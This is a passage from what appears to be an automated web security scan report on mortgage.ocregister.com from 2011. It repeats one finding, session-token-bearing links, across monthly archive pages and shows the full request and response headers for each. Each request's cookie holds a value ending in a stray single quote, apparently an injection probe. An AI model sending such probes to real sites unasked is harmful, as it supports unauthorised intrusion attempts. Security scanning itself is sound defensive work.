Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.50. http://mortgage.ocregister.com/2009/07/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 113758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.51. http://mortgage.ocregister.com/2009/08/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.52. http://mortgage.ocregister.com/2009/09/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.53. http://mortgage.ocregister.com/2009/10/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.54. http://mortgage.ocregister.com/2009/11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.55. http://mortgage.ocregister.com/2009/12/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.56. http://mortgage.ocregister.com/2010/01/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.57. http://mortgage.ocregister.com/2010/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.58. http://mortgage.ocregister.com/2010/03/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.59. http://mortgage.ocregister.com/2010/04/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.60. http://mortgage.ocregister.com/2010/05/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.61. http://mortgage.ocregister.com/2010/06/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.62. http://mortgage.ocregister.com/2010/07/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.63. http://mortgage.ocregister.com/2010/08/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.64. http://mortgage.ocregister.com/2010/09/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.65. http://mortgage.ocregister.com/2010/10/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.66. http://mortgage.ocregister.com/2010/11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.67. http://mortgage.ocregister.com/2010/12/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.68. http://mortgage.ocregister.com/2011/01/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
